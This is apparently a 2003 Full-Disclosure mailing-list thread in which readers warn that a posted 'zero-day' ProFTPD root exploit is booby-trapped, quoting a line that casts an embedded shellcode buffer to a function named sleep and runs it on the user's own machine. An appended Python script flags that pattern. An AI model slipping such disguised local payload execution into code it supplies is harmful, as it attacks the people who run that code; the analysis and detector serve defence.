Message-ID: <6B67002C3FDED3119E5F00508B95969710E95445@TOCOMEXC15>
From: lionel.garcia at airbus.com (GARCIA Lionel)
Subject: ProFTPD-1.2.9rc2 remote root exploit
This line seems suspicious. Don't know the purpose of the shellcode, but I
won't try it.
/* connect to the bindshell */
printf("Trying to connect, please wait...\n");
---> void(*sleep)()=(void*)sc;sleep(5); <------- Hummm :-\
if(give_me_a_shell(addr) < 0)
{
fprintf(stderr, "Sorry, exploit didn't work.\n");
return(-1);
The shellcode seems to be locally launched. Anybody to "decrypt" the
shellcode?
> -----Original Message-----
> From: Andreas Gietl [mailto:a.gietl@...dmin.de]
> Sent: Friday 24 October 2003 15:36
> To: Jean-Kevin Grosnakeur; full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
>
>
> On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
>
> this seems to delete sth on the local harddisk. anybody else seeing this
> effect?
>
> > Ladies and gentlemen, here's the source code of the exploit for the latest
> > release of ProFTPD. This is a Zero-Day private exploit, please DON'T
> > REDISTRIBUTE. I will not take responsibility for any damages which could
> > result from the usage of this exploit, use it at your own risk.
> >
> > --------------------------------------------------------------------------
> >
> > Have fun ! @+
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> --
> e-admin internet gmbh
> Andreas Gietl              tel   +49 941 3810884
> Ludwig-Thoma-Strasse 35    fax   +49 (0)1805/39160 - 29104
> 93051 Regensburg           mobil +49 171 6070008
>
> PGP/GPG-Key unter http://www.e-admin.de/gpg.html
>
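
Added example (not part of the original message or of the posted exploit): a small Python triage check for the pattern pointed out above, where a byte-string buffer is cast to a function pointer named after a libc function and then called on the local machine. The regexes, the LIBC_NAMES list and the sample source are constructed for illustration; only the `void(*sleep)()` line comes from the message.

```python
import re

# libc names a booby-trapped PoC may reuse so the call looks harmless (assumed list).
LIBC_NAMES = {"sleep", "usleep", "printf", "puts", "close", "free", "exit"}

# A char array initialised from one or more string literals made only of \xNN escapes.
BUF_RE = re.compile(
    r'\b(?:unsigned\s+)?char\s+(\w+)\s*\[\s*\d*\s*\]\s*=\s*'
    r'(?:"(?:\\x[0-9a-fA-F]{2})+"\s*)+;')

# A function-pointer declaration initialised from a cast: T (*name)(...) = (cast) ident;
FPTR_RE = re.compile(
    r'\(\s*\*\s*(\w+)\s*\)\s*\([^)]*\)\s*=\s*\([^)]*\)\s*&?\s*(\w+)\s*;')


def audit(source):
    """Return one finding per function pointer that is aimed at a byte buffer."""
    buffers = set(BUF_RE.findall(source))
    findings = []
    for m in FPTR_RE.finditer(source):
        name, target = m.groups()
        if target not in buffers:
            continue  # pointer to ordinary code, not to data
        call = re.search(r'\b' + re.escape(name) + r'\s*\(', source[m.end():])
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "pointer": name,
            "buffer": target,
            "shadows_libc": name in LIBC_NAMES,
            "called_locally": call is not None,
        })
    return findings


# Constructed sample: placeholder bytes plus the line quoted in the message above.
SAMPLE = r'''
char sc[] = "\x90\x90\x90\x90";
int main(void) {
    printf("Trying to connect, please wait...\n");
    void(*sleep)()=(void*)sc;sleep(5);
    return 0;
}
'''

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f)
```

A finding with both shadows_libc and called_locally set means the source runs its embedded bytes on the auditor's own host, so it should only be examined statically or in a disposable, isolated machine.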